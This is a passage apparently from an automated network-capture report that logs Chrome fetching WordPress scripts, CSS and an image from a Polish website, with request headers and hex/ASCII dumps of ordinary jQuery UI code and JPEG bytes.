                                                            2025-01-15 10:07:58 UTC4186INData Raw: 2e 6d 65 6a 73 2d 63 6f 6e 74 61 69 6e 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 65 6a 73 2d 63 6f 6e 74 61 69 6e 65 72 20 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 7d 2e 6d 65 6a 73 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e 6d 65 6a 73 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 6d 65 6a 73 2d 63 6f 6e 74 72 6f 6c 73 2c 2e 6d 65 6a 73 2d 65 6d 62 65 64 2c 2e 6d 65 6a 73 2d 65 6d 62 65 64 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 32 32 7d 2e 6d 65 6a 73 2d 74 69 6d 65 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 77 6f 72 64 2d 77 72 61 70 3a 6e 6f 72 6d 61 6c 7d 2e 6d 65 6a 73 2d 63 6f 6e 74 72 6f 6c 73 20 61 2e 6d 65 6a 73 2d 68 6f 72 69 7a 6f 6e 74 61
                                                            Data Ascii: .mejs-container{clear:both;max-width:100%}.mejs-container *{font-family:Helvetica,Arial}.mejs-container,.mejs-container .mejs-controls,.mejs-embed,.mejs-embed body{background:#222}.mejs-time{font-weight:400;word-wrap:normal}.mejs-controls a.mejs-horizonta


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            31192.168.2.1649743178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:59 UTC592OUTGET /wp-includes/js/jquery/ui/core.min.js?ver=1.12.1 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:59 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:59 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:15:30 GMT
                                                            ETag: "5133-620a932910455"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 20787
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:07:59 UTC7906INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 55 49 20 2d 20 76 31 2e 31 32 2e 31 20 2d 20 32 30 32 30 2d 30 39 2d 32 35 0a 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 2a 20 49 6e 63 6c 75 64 65 73 3a 20 64 61 74 61 2e 6a 73 2c 20 64 69 73 61 62 6c 65 2d 73 65 6c 65 63 74 69 6f 6e 2e 6a 73 2c 20 65 73 63 61 70 65 2d 73 65 6c 65 63 74 6f 72 2e 6a 73 2c 20 66 6f 63 75 73 61 62 6c 65 2e 6a 73 2c 20 66 6f 72 6d 2d 72 65 73 65 74 2d 6d 69 78 69 6e 2e 6a 73 2c 20 66 6f 72 6d 2e 6a 73 2c 20 69 65 2e 6a 73 2c 20 6a 71 75 65 72 79 2d 31 2d 37 2e 6a 73 2c 20 6b 65 79 63 6f 64 65 2e 6a 73 2c 20 6c 61 62 65 6c 73 2e 6a 73 2c 20 70 6c 75 67 69 6e 2e 6a 73 2c 20 70 6f 73 69 74 69 6f 6e 2e 6a 73 2c 20 73 61 66 65 2d 61 63 74 69 76 65 2d 65 6c 65 6d 65 6e 74 2e
                                                            Data Ascii: /*! jQuery UI - v1.12.1 - 2020-09-25* http://jqueryui.com* Includes: data.js, disable-selection.js, escape-selector.js, focusable.js, form-reset-mixin.js, form.js, ie.js, jquery-1-7.js, keycode.js, labels.js, plugin.js, position.js, safe-active-element.
                                                            2025-01-15 10:07:59 UTC8000INData Raw: 28 69 5b 30 5d 29 5b 30 5d 2c 6c 2e 65 78 65 63 28 69 5b 31 5d 29 5b 30 5d 5d 7d 29 2c 31 3d 3d 3d 79 2e 6c 65 6e 67 74 68 26 26 28 79 5b 31 5d 3d 79 5b 30 5d 29 2c 22 72 69 67 68 74 22 3d 3d 3d 66 2e 61 74 5b 30 5d 3f 6d 2e 6c 65 66 74 2b 3d 64 3a 22 63 65 6e 74 65 72 22 3d 3d 3d 66 2e 61 74 5b 30 5d 26 26 28 6d 2e 6c 65 66 74 2b 3d 64 2f 32 29 2c 22 62 6f 74 74 6f 6d 22 3d 3d 3d 66 2e 61 74 5b 31 5d 3f 6d 2e 74 6f 70 2b 3d 70 3a 22 63 65 6e 74 65 72 22 3d 3d 3d 66 2e 61 74 5b 31 5d 26 26 28 6d 2e 74 6f 70 2b 3d 70 2f 32 29 2c 75 3d 45 28 5f 2e 61 74 2c 64 2c 70 29 2c 6d 2e 6c 65 66 74 2b 3d 75 5b 30 5d 2c 6d 2e 74 6f 70 2b 3d 75 5b 31 5d 2c 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 2c 74 2c 72 3d 78 28 74 68 69 73 29
                                                            Data Ascii: (i[0])[0],l.exec(i[1])[0]]}),1===y.length&&(y[1]=y[0]),"right"===f.at[0]?m.left+=d:"center"===f.at[0]&&(m.left+=d/2),"bottom"===f.at[1]?m.top+=p:"center"===f.at[1]&&(m.top+=p/2),u=E(_.at,d,p),m.left+=u[0],m.top+=u[1],this.each(function(){var i,t,r=x(this)
                                                            2025-01-15 10:07:59 UTC4881INData Raw: 74 4f 70 74 69 6f 6e 44 69 73 61 62 6c 65 64 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 64 69 73 61 62 6c 65 64 29 2c 74 68 69 73 2e 5f 74 72 69 67 67 65 72 28 22 63 72 65 61 74 65 22 2c 6e 75 6c 6c 2c 74 68 69 73 2e 5f 67 65 74 43 72 65 61 74 65 45 76 65 6e 74 44 61 74 61 28 29 29 2c 74 68 69 73 2e 5f 69 6e 69 74 28 29 7d 2c 5f 67 65 74 43 72 65 61 74 65 4f 70 74 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 7d 7d 2c 5f 67 65 74 43 72 65 61 74 65 45 76 65 6e 74 44 61 74 61 3a 78 2e 6e 6f 6f 70 2c 5f 63 72 65 61 74 65 3a 78 2e 6e 6f 6f 70 2c 5f 69 6e 69 74 3a 78 2e 6e 6f 6f 70 2c 64 65 73 74 72 6f 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 3d 74 68 69 73 3b 74 68 69 73 2e 5f 64 65 73 74 72 6f 79 28 29 2c 78 2e 65 61 63 68
                                                            Data Ascii: tOptionDisabled(this.options.disabled),this._trigger("create",null,this._getCreateEventData()),this._init()},_getCreateOptions:function(){return{}},_getCreateEventData:x.noop,_create:x.noop,_init:x.noop,destroy:function(){var i=this;this._destroy(),x.each


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            32192.168.2.1649745178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:59 UTC592OUTGET /wp-includes/js/jquery/ui/menu.min.js?ver=1.12.1 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:59 UTC285INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:59 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:15:31 GMT
                                                            ETag: "253b-620a932a95e93"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 9531
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:07:59 UTC7907INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 4d 65 6e 75 20 31 2e 31 32 2e 31 0a 20 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 2c 22 2e 2f 63 6f 72 65 22 5d 2c
                                                            Data Ascii: /*! * jQuery UI Menu 1.12.1 * http://jqueryui.com * * Copyright jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license */!function(e){"function"==typeof define&&define.amd?define(["jquery","./core"],
                                                            2025-01-15 10:07:59 UTC1624INData Raw: 70 72 65 76 41 6c 6c 28 22 2e 75 69 2d 6d 65 6e 75 2d 69 74 65 6d 22 29 2e 6c 65 6e 67 74 68 7d 2c 69 73 4c 61 73 74 49 74 65 6d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 61 63 74 69 76 65 26 26 21 74 68 69 73 2e 61 63 74 69 76 65 2e 6e 65 78 74 41 6c 6c 28 22 2e 75 69 2d 6d 65 6e 75 2d 69 74 65 6d 22 29 2e 6c 65 6e 67 74 68 7d 2c 5f 6d 6f 76 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 29 7b 76 61 72 20 73 3b 28 73 3d 74 68 69 73 2e 61 63 74 69 76 65 3f 22 66 69 72 73 74 22 3d 3d 3d 65 7c 7c 22 6c 61 73 74 22 3d 3d 3d 65 3f 74 68 69 73 2e 61 63 74 69 76 65 5b 22 66 69 72 73 74 22 3d 3d 3d 65 3f 22 70 72 65 76 41 6c 6c 22 3a 22 6e 65 78 74 41 6c 6c 22 5d 28 22 2e 75 69 2d 6d 65 6e 75 2d 69 74 65 6d 22 29 2e 65 71 28 2d 31
                                                            Data Ascii: prevAll(".ui-menu-item").length},isLastItem:function(){return this.active&&!this.active.nextAll(".ui-menu-item").length},_move:function(e,t,i){var s;(s=this.active?"first"===e||"last"===e?this.active["first"===e?"prevAll":"nextAll"](".ui-menu-item").eq(-1


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            33192.168.2.1649746178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:59 UTC412OUTGET /wp-content/uploads/2016/08/gift-553158_1920.jpg HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:59 UTC260INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:59 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:54:21 GMT
                                                            ETag: "4f3ab-620a8e6ef1d17"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 324523
                                                            Content-Type: image/jpeg
                                                            2025-01-15 10:07:59 UTC7932INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 05 00 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                            Data Ascii: JFIFCC"}!1AQa"q2
                                                            2025-01-15 10:07:59 UTC8000INData Raw: 51 b7 15 26 33 cd 04 50 3e 62 32 3d 01 a3 18 ed 4f 23 da 8c 77 a0 2e 33 14 6d a7 63 be 3a 51 8a 77 0b 8d 03 be 28 c0 a7 e0 e3 a5 18 a2 e1 71 98 f5 a3 1c d3 b1 fa d2 ed e7 9a 77 0b 8c da 73 4a 06 0d 3f 6f b5 2e 0d 17 15 c8 c2 d2 ed 3e 94 f0 b8 a7 6d f4 06 8b 85 c8 f6 e2 94 2d 3c 0f 6a 70 4f d6 8b 92 e4 46 12 97 66 2a 40 be d4 e0 82 95 d9 3c c4 61 69 c1 4f 5a 90 29 14 e0 b4 5c 97 22 20 be d4 e0 a0 54 9b 4f a5 28 4a 08 72 1a 05 38 2d 38 21 e8 39 a7 ed a4 43 90 c2 b8 e9 4d 35 23 54 4d eb 9a 2e 11 63 18 e2 ab cd 20 19 a7 cb 20 15 42 79 ba f3 4c d9 69 b9 1d c4 f8 ac ab 9b 8c 67 9e 95 2d cc fd 79 fc eb 1e ee e4 8c f3 d2 ae 28 8a 95 12 1b 75 77 d8 13 58 b7 d7 b8 ce d2 29 f7 77 60 67 9c 7a 56 1d e5 d1 62 5b 38 c9 e0 55 a4 79 15 eb b9 3b 22 1b 99 cb 9c 1c fa d5 19
                                                            Data Ascii: Q&3P>b2=O#w.3mc:Qw(qwsJ?o.>m-<jpOFf*@<aiOZ)\" TO(Jr8-8!9CM5#TM.c ByLig-y(uwX)w`gzVb[8Uy;"
                                                            2025-01-15 10:07:59 UTC8000INData Raw: f6 ad 6c 6a 93 66 95 fe af b4 91 bf 9c e3 15 ce de eb 38 dc 43 1e fd ab 2b 52 d6 82 92 37 e3 35 cd 5f eb 5f 78 2b 9e 38 35 49 5c da 14 9c 8d 8b ed 61 9b 24 1c 9f 63 d2 b9 fb cd 58 b3 37 cf 8e fc 9f 6a c8 ba d5 1d 86 4b 0c 1e 98 3f d6 b3 26 bc 91 c9 00 15 e6 a9 42 e7 5c 28 17 ef 35 0c 9c 12 49 e9 b7 3f e7 9a cd 92 66 71 f3 bf 5e bb 87 15 19 62 48 dc c4 9e 7b fb d2 64 71 ec 71 9f 6a d6 31 b1 d5 18 28 92 6e 20 e4 e7 eb 4c 62 40 39 e3 b0 a4 04 77 eb f5 e9 f5 a4 66 3d 81 c0 1d 2a ec 53 b2 02 dc 90 39 24 64 7f 8d 33 a8 00 70 7f fa d4 e2 a7 76 d2 06 0f 4c 53 92 32 d8 3c 10 79 e9 f9 53 25 bb 0c 54 cf 51 9c f6 a9 e1 89 9b 6f d7 d2 a7 8a d8 b6 31 df af 15 7a da d3 71 1f 21 3e d4 ae 88 6c ab 0d ae ee 71 8e 99 c5 6a 5a 58 b8 c0 50 57 b0 0b 5a 16 9a 69 2c 37 2f 7c 82
                                                            Data Ascii: ljf8C+R75__x+85I\a$cX7jK?&B\(5I?fq^bH{dqqj1(n Lb@9wf=*S9$d3pvLS2<yS%TQo1zq!>lqjZXPWZi,7/|
                                                            2025-01-15 10:07:59 UTC8000INData Raw: c2 d9 c3 67 3d 70 6b 2a e6 73 9c 16 e4 0f 5e 95 1c d7 98 cf 4e 38 f4 aa 32 dd 17 1c 71 ed 55 6b 1b 46 21 2c 87 71 cf 7f 6c 62 a2 32 30 3c 13 8e f8 3d 32 69 24 01 b9 04 7b 7b 54 0e b8 6c 6e c7 e3 da a9 1b 46 23 cb 9c f5 c9 19 c7 7e 29 d1 3f 4e 1b 8e f5 12 31 3c 1e a3 9e 2a dc 36 ed 21 18 ce df d2 86 32 fe 9f 19 91 d7 8e 09 ce 6b ad d3 ad 9b 68 c0 e3 03 f1 ac dd 23 4f c2 ab 6c c9 04 0a e9 a0 88 46 06 ee 3f 1a 83 36 b5 1e 91 f9 6a 0e 39 f4 a8 65 3c 92 31 cf 5a b2 ee 80 72 73 54 ee 24 eb c6 46 28 22 da 94 ae 9b aa 93 d3 bf 5a c9 97 20 e7 3d 6a ed c4 fc f7 c1 35 55 d7 20 e0 8e 39 a9 6c 65 40 4e 3a 75 3d 69 9d b0 0f 4e d5 33 0c 02 37 63 3d 71 50 b1 dd c6 79 eb d6 91 29 82 8e c7 f0 19 fd 69 09 e7 18 3f 87 f9 f7 a7 02 30 72 32 0f 23 9a 69 e7 9f a7 6e f4 0d 8c 25
                                                            Data Ascii: g=pk*s^N82qUkF!,qlb20<=2i${{TlnF#~)?N1<*6!2kh#OlF?6j9e<1ZrsT$F("Z =j5U 9le@N:u=iN37c=qPy)i?0r2#in%
                                                            2025-01-15 10:07:59 UTC8000INData Raw: e9 d7 8e 94 ca 03 cf 18 ce 3b d4 32 36 3a 30 cf 5f ad 4c 06 41 ef ec 6a bc fb b9 a4 26 44 5f 0c 30 7a 72 6a 54 60 46 3b 55 7e ac 71 cf 39 f7 eb 4f 12 1c 63 b0 eb fd 68 10 f7 39 56 ce 09 c7 23 3d 7d 6a 3d c4 fc c7 9f 4a 79 04 03 9c 83 9c f2 7b d4 65 ba 93 92 47 1c fa 53 40 0c 36 9e 00 1d b8 f4 a6 b6 55 4e 5b 24 73 cd 3b 70 ed d8 fe b4 c7 3e 9d 3f 3e 6a 82 c3 72 0f 39 c6 3d a9 e0 f1 9e a4 f3 50 e3 27 27 04 d3 c3 67 83 f8 0a 00 91 b1 cf 43 8f 5e b5 0c 9c 8c 13 d7 a7 3f 85 48 0e 39 ce 7a f4 a6 36 0b 64 67 23 f2 34 01 5d 94 ee 20 b0 3d bd a9 98 3e 83 d7 9e f5 3b 28 24 60 fd 3e b4 cd 87 fc 28 25 8c 24 f5 e8 01 ed 5a 3a 54 fb 5b 19 23 af 7a a0 47 cd fe 1f d6 9d 03 79 6e 18 b7 53 d8 74 ac ea 41 4e 2d 33 0a d0 55 22 e2 cf b0 41 3c d3 c3 54 63 af 07 ad 38 67 ae 07
                                                            Data Ascii: ;26:0_LAj&D_0zrjT`F;U~q9Och9V#=}j=Jy{eGS@6UN[$s;p>?>jr9=P''gC^?H9z6dg#4] =>;($`>(%$Z:T[#zGynStAN-3U"A<Tc8g
                                                            2025-01-15 10:07:59 UTC8000INData Raw: e5 40 39 fc 85 40 7c c9 93 72 72 c0 67 af e9 4a c5 16 e2 8a 34 c3 38 c1 3c e7 d2 86 9c 97 c1 05 88 eb 81 d2 a9 ec b9 d9 86 38 c1 e9 9e a6 ac c5 04 a0 28 72 09 23 3c 55 0d 68 32 e2 68 c1 d8 47 5f 4e 38 a6 c0 b6 e2 36 0d 9c 13 ce 06 31 f9 d0 f0 30 60 bb 48 e4 6f 03 d2 9c db 12 26 44 03 78 e3 df f3 a7 b0 d0 ec 5b c0 fd 78 6e 01 ef f9 d5 99 60 8c 15 78 66 24 e7 24 76 ff 00 3d 6a a0 1c 07 92 32 1f a6 09 c0 3c ff 00 f5 aa 49 1c 0b 6f 2a 14 2d 1b 0f 94 ff 00 12 1f 71 49 ab 85 cd 1b 67 b5 60 19 58 a4 c7 a1 1c 1c d6 b6 8d 6f 34 d3 65 e4 24 29 f4 e3 3e b5 cf 68 91 3b a6 cb cc 6f 2c 76 11 d3 27 d7 f1 af 4c f0 cf 86 dc 2a 4b 3d b2 a6 40 0c 0b 67 24 ff 00 91 50 c8 93 35 f4 dd 39 63 8a 37 65 3e 59 1d fb ff 00 9e 69 9a 8e a1 15 ae f8 b2 5a 37 03 df bd 6c 5f 49 05 bd b4
                                                            Data Ascii: @9@|rrgJ48<8(r#<Uh2hG_N8610`Ho&Dx[xn`xf$$v=j2<Io*-qIg`Xo4e$)>h;o,v'L*K=@g$P59c7e>YiZ7l_I
                                                            2025-01-15 10:07:59 UTC8000INData Raw: 77 41 cd 2f 4a 68 cd 2e 79 e7 9f ad 03 b0 e1 f9 d1 48 38 a0 1e c2 80 b0 ea 5e 83 ad 27 e5 46 72 69 5c 76 1d 47 34 80 81 c5 1d 3e 94 5c 76 61 df a5 2e 7d e9 01 a0 1f 4a 77 0b 05 2e 69 38 ed 41 34 0e c2 e4 d1 f5 a4 ce 78 a3 3d e8 25 a1 40 14 a3 da 9b 9e 29 72 28 15 85 18 e3 db da 9c 30 3d 69 a0 f3 cd 38 71 83 4e e4 35 61 71 ed 4a 29 a2 9c 0d 17 21 a1 d4 52 03 4e a4 4b 41 82 3b d2 8e 4f 4a 41 ce 0d 3c 50 43 01 47 22 96 94 7a 74 a0 40 07 d6 8c 0c e6 94 52 fd 28 24 6f 34 63 eb 4f ef 4a 14 62 80 19 8a 31 4e c5 2e da 00 61 19 e2 8c 63 b5 3f 6f 6a 4d be b4 02 18 45 34 a9 3d 2a 5c 0a 36 fb 52 6c ab 91 15 c5 37 1d f1 53 6d 14 9b 7b 51 72 93 22 2a 7d 69 bb 4d 4f b4 fb 53 4a fa d1 72 ae 43 b6 93 67 6a 98 8c 76 a4 2b 8e 98 a2 e3 4c 84 a9 ed 46 cc 75 a9 76 fb 53 76 8e
                                                            Data Ascii: wA/Jh.yH8^'Fri\vG4>\va.}Jw.i8A4x=%@)r(0=i8qN5aqJ)!RNKA;OJA<PCG"zt@R($o4cOJb1N.ac?ojME4=*\6Rl7Sm{Qr"*}iMOSJrCgjv+LFuvSv
                                                            2025-01-15 10:07:59 UTC8000INData Raw: 34 e1 e8 69 5c 56 43 c1 a7 a9 a6 01 eb 52 28 3d e9 12 38 73 4f 51 4d 00 54 8a 0f a5 26 c8 63 80 e3 9a 70 1e d8 a4 03 eb 4f c5 2d c8 62 e2 9c 07 af d6 8f c6 9c 3d a9 11 70 c0 fc 29 40 e6 80 29 70 0f 5a 04 2f 18 a5 c6 69 06 29 7b f2 28 0b 8a 05 14 7b d1 d6 80 b8 63 da 8c 71 f5 a5 14 bc 1a 07 71 bd ba d2 62 9c 46 38 34 87 d6 82 93 10 fd 29 0e 29 7a 70 7b 51 81 41 49 88 69 06 68 e4 d2 67 de 82 c5 3e b4 67 9a 4c e6 8a b4 02 f5 a3 b0 34 80 fa 53 bf 5a 04 c5 e3 fc 69 c2 99 d7 a7 4a 70 3f e3 41 9c 90 ee 7a f1 4b eb 4d c8 a7 7d 28 20 5e 29 c3 d6 9a 3b 52 83 c5 04 0f 19 3c 52 8a 6f 1d 69 d4 10 c7 0f 61 4e 14 c0 69 f9 1c fb 52 b9 0d 0e 14 bf 53 4d a7 0a 92 58 e1 8a 75 34 1e 38 fe 74 fa 08 62 8a 51 f5 a4 1e 86 9c 05 04 8b db 8a 31 9e b4 b4 0a 4d 89 b0 c7 3c d2 e3 1d
                                                            Data Ascii: 4i\VCR(=8sOQMT&cpO-b=p)@)pZ/i){({cqqbF84))zp{QAIihg>gL4SZiJp?AzKM}( ^);R<RoiaNiRSMXu48tbQ1M<
                                                            2025-01-15 10:07:59 UTC8000INData Raw: 00 13 4d 0d a9 c5 9d c0 13 5b 1c ff 00 cb 33 9c 0f a8 39 1f 85 7d 05 a3 5c ad fd 94 72 c7 f7 65 42 46 4f bf f8 ff 00 3a e7 7c 7b e1 48 3c 4b a5 9b 22 9b 6f a0 0d 2d 93 8e e7 ab 46 7e bd 47 d2 b6 83 dd 1e 8d 2a ff 00 57 ac af b3 dc f9 c5 24 31 31 19 07 1f 2e 2a eb 49 1c 90 96 24 74 e7 06 ab 5d 5a 4b 6b 33 2c 8a 55 cb ed 2a 78 c1 1d aa 26 95 0f cb 8f 66 1d 39 aa 3d cd 1a ba 26 8d 59 94 f4 39 e3 3d ff 00 cf 15 5a e1 0c 32 ee 46 3e fd aa e2 b4 70 44 06 7a 9a a1 3d c9 f3 36 b1 1b 58 f1 9e 31 4d 0c 99 1d 18 10 11 41 18 e6 a3 53 22 4f f7 78 39 e7 1c 1a 23 c0 27 18 e0 64 0a 91 19 59 72 48 1f d6 82 85 38 04 b1 e3 34 dc b1 18 cd 23 a6 7b 74 eb 8e f4 e0 c0 64 03 82 33 d7 bd 04 10 b0 21 89 63 cf 63 4f f3 06 06 70 00 e3 9e 94 d9 0a 9e 87 35 5c c8 4e 46 79 f7 f4 fe 94
                                                            Data Ascii: M[39}\reBFO:|{H<K"o-F~G*W$11.*I$t]ZKk3,U*x&f9=&Y9=Z2F>pDz=6X1MAS"Ox9#'dYrH84#{td3!ccOp5\NFy
                                                            2025-01-15 10:07:59 UTC8000INData Raw: 54 8b 8d 3e df 62 8c 6d 18 e9 d2 b1 ae ae 5c b1 75 1c 0f 43 49 58 95 04 cf 58 f8 71 f1 86 d3 ed cb a3 f8 8a e0 47 21 21 56 47 3c 67 b6 4d 7b 6d a6 b5 a7 dc 84 96 06 5f 7c 1e 0f d2 be 12 d5 e2 b9 93 37 08 c4 4a 9c a9 1c 64 8a eb 3e 1b 7c 6e bd d3 67 8f 46 d6 6e 18 18 b0 8a 5d fb 7d 7d 2b 1a b8 78 cd 5d 6e 79 58 ec ad 54 fd e5 2d fa a3 ee 7b 2b bb 79 62 1e 53 8c f7 15 97 af 5d 5b a2 e5 88 20 1e 6b cd f4 6f 1d c7 73 68 97 30 5c 82 18 0e 87 35 3d df 89 de fe 32 37 60 81 c9 3d eb 96 38 69 27 73 e7 7e ab 38 bd 4e ac c9 a7 b2 17 8c 82 e4 75 1f c4 29 56 e2 37 88 5b 26 10 28 e0 fb 57 12 9a 94 81 4a 44 d9 39 e0 56 ce 91 6b a9 4f 61 f6 d9 48 3b 86 e5 e7 a0 a2 74 b9 55 db 14 a9 59 6a ca 1e 34 d4 cc 16 38 87 22 6c e0 ed e3 8f fe bd 45 f0 fb 4e 84 29 d4 35 4b 1d c2 e0
                                                            Data Ascii: T>bm\uCIXXqG!!VG<gM{m_|7Jd>|ngFn]}}+x]nyXT-{+ybS][ kosh0\5=27`=8i's~8Nu)V7[&(WJD9VkOaH;tUYj48"lEN)5K


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            34192.168.2.1649749178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:59 UTC609OUTGET /wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.7 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:59 UTC285INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:59 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:15:27 GMT
                                                            ETag: "1906-620a93268102c"
                                                            Accept-Ranges: bytes
